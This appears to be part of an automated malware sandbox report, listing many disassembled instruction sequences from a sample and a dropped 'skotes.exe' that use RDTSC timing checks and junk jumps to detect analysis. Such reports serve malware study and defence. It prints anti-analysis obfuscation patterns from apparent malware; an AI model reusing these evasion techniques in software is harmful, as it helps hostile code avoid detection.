0x0000004e mov edi, edi 0x00000050 jmp 00007F0704B35540h 0x00000055 xchg eax, ebp 0x00000056 jmp 00007F0704B35540h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0704B3553Eh 0x00000063 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90008 second address: 4B9000D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9000D second address: 4B900AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0704B3553Bh 0x0000000a xor si, BC6Eh 0x0000000f jmp 00007F0704B35549h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0704B3553Ch 0x00000020 adc eax, 6C3CA7E8h 0x00000026 jmp 00007F0704B3553Bh 0x0000002b popfd 0x0000002c call 00007F0704B35548h 0x00000031 mov bl, ch 0x00000033 pop edi 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F0704B3553Dh 0x0000003b xchg eax, ebp 0x0000003c pushad 0x0000003d movzx ecx, dx 0x00000040 movsx ebx, ax 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 jmp 00007F0704B35540h 0x0000004b and esp, FFFFFFF8h 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B900AE second address: 4B900CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B900CB second address: 4B90101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F0704B3553Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0704B3553Dh 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90101 second address: 4B90116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90116 second address: 4B9011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9011C second address: 4B90120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90120 second address: 4B9013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9013E second address: 4B90150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov al, B0h 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, ebx 0x0000000e mov ax, dx 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90150 second address: 4B90156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90156 second address: 4B9015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9015A second address: 4B901CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e jmp 00007F0704B35540h 0x00000013 mov ebx, dword ptr [ebp+10h] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F0704B3553Dh 0x0000001e jmp 00007F0704B3553Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 mov ebx, 5F3C4F8Ch 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov ecx, 70CBEB8Dh 0x00000032 popad 0x00000033 mov dword ptr [esp], esi 0x00000036 jmp 00007F0704B3553Fh 0x0000003b mov esi, dword ptr [ebp+08h] 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B901CC second address: 4B901E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esp 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d popad 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B901E3 second address: 4B901E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B901E7 second address: 4B901ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B901ED second address: 4B9020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0704B35541h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9020E second address: 4B9024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0704B3A4A7h 0x00000009 xor esi, 6E0BB85Eh 0x0000000f jmp 00007F0704B3A4A9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9024B second address: 4B902CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F07775138F9h 0x0000000d pushad 0x0000000e mov di, si 0x00000011 pushfd 0x00000012 jmp 00007F0704B35546h 0x00000017 jmp 00007F0704B35545h 0x0000001c popfd 0x0000001d popad 0x0000001e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F0704B35543h 0x0000002e and si, 587Eh 0x00000033 jmp 00007F0704B35549h 0x00000038 popfd 0x00000039 mov edx, eax 0x0000003b popad 0x0000003c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B902CA second address: 4B902FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F07775187E6h 0x0000000f jmp 00007F0704B3A49Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, 659Fh 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B902FA second address: 4B90300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90300 second address: 4B9033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F0704B3A4A3h 0x00000010 test edx, 61000000h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0704B3A4A5h 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9033B second address: 4B90384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F077751386Eh 0x0000000f jmp 00007F0704B3553Eh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007F0704B35540h 0x0000001d jne 00007F077751385Fh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90384 second address: 4B9038A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B9038A second address: 4B90390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90390 second address: 4B90394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B8079B second address: 4B807A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B807A1 second address: 4B807A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B807A5 second address: 4B807C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e push edi 0x0000000f pop eax 0x00000010 popad 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B807C2 second address: 4B807E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0704B3A49Ch 0x0000000a xor cx, C568h 0x0000000f jmp 00007F0704B3A49Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B807E5 second address: 4B80812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0704B3553Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80812 second address: 4B80818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80818 second address: 4B8081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B8081C second address: 4B80893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0704B3A4A9h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 pushfd 0x00000015 jmp 00007F0704B3A4A3h 0x0000001a sbb ecx, 771388CEh 0x00000020 jmp 00007F0704B3A4A9h 0x00000025 popfd 0x00000026 pop ecx 0x00000027 mov eax, edi 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ecx, edx 0x00000030 mov bh, 29h 0x00000032 popad 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80893 second address: 4B808D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007F0704B35547h 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 jmp 00007F0704B35546h 0x0000001b sub ebx, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B808D9 second address: 4B808DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B808DD second address: 4B808E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B808E3 second address: 4B80920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 36h 0x00000005 call 00007F0704B3A49Ch 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 jmp 00007F0704B3A4A1h 0x00000015 je 00007F077751FF19h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0704B3A49Dh 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80ABC second address: 4B80AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80AC2 second address: 4B80AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80B0F second address: 4B80B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80B13 second address: 4B80B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80B17 second address: 4B80B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90CD2 second address: 4B90D48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0704B3A4A3h 0x00000013 adc ecx, 6C56009Eh 0x00000019 jmp 00007F0704B3A4A9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F0704B3A4A0h 0x00000025 or al, FFFFFF98h 0x00000028 jmp 00007F0704B3A49Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90D48 second address: 4B90D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90D4E second address: 4B90D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90D52 second address: 4B90D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B90D56 second address: 4B90D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F0704B3A4A7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0704B3A4A5h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C105FC second address: 4C10602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C10602 second address: 4C10629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, ax 0x00000012 jmp 00007F0704B3A49Eh 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C10629 second address: 4C1062F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C1062F second address: 4C10633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C10633 second address: 4C10637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C10637 second address: 4C1067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F0704B3A49Fh 0x0000000f jmp 00007F0704B3A4A8h 0x00000014 pop eax 0x00000015 push edx 0x00000016 mov cx, 3D1Dh 0x0000001a pop esi 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov ebx, 54697AEAh 0x00000024 push eax 0x00000025 push edx 0x00000026 mov ebx, 34953024h 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C0096D second address: 4C00991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0704B3553Ch 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00991 second address: 4C009C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0704B3A4A6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, cx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C0076F second address: 4C00773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00773 second address: 4C00786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00786 second address: 4C0078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C0078C second address: 4C00790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00790 second address: 4C007E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0704B35549h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F0704B3553Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0704B35547h 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C007E5 second address: 4C007EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C007EB second address: 4C007EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00B70 second address: 4C00BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 mov dl, ah 0x00000009 pushfd 0x0000000a jmp 00007F0704B3A4A3h 0x0000000f jmp 00007F0704B3A4A3h 0x00000014 popfd 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F0704B3A4A6h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0704B3A49Ah 0x00000027 and al, 00000058h 0x0000002a jmp 00007F0704B3A49Bh 0x0000002f popfd 0x00000030 popad 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00BE2 second address: 4C00BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00BE6 second address: 4C00BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00BEC second address: 4C00C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c jmp 00007F0704B35540h 0x00000011 push 24853E09h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0704B3553Dh 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00C22 second address: 4C00C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushfd 0x00000007 jmp 00007F0704B3A49Ah 0x0000000c add esi, 37B00748h 0x00000012 jmp 00007F0704B3A49Bh 0x00000017 popfd 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00C45 second address: 4C00C66 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 24843E0Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0704B35541h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00C66 second address: 4C00C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4C00C6C second address: 4C00C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D2DE second address: B5D2F3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0704B3A49Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D2F3 second address: B5D2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 2FEDA3 second address: 2FEDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 2FEDAB second address: 2FEDE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Bh 0x00000007 jmp 00007F0704B35541h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 jmp 00007F0704B35544h 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 3066D7 second address: 3066DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 3066DB second address: 3066F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F0704B35536h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0704B3553Bh 0x00000017 rdtsc
